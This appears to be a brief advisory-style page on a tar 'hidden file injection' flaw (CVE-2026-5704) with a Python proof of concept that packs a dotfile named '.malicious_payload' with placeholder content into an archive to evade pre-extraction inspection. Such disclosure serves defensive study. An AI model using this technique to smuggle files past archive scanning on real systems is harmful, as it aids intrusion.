CVE-2026-5704 tar隐藏文件注入漏洞

import tarfile import os # Proof of Concept for CVE-2026-5704 # This script demonstrates how to create a tar archive containing a hidden file # that might bypass pre-extraction inspection mechanisms. def create_malicious_tar(filename, output_tar): with tarfile.open(output_tar, "w") as tar: # Create a hidden file with attacker-controlled content hidden_file_name = ".malicious_payload" content = b"Attacker controlled content" # Add file to archive info = tarfile.TarInfo(name=hidden_file_name) info.size = len(content) tar.addfile(info, fileobj=io.BytesIO(content)) print(f"[+] Created malicious tar archive: {output_tar}") print(f"[+] Archive contains hidden file: {hidden_file_name}") if __name__ == "__main__": import io create_malicious_tar("data.txt", "exploit.tar")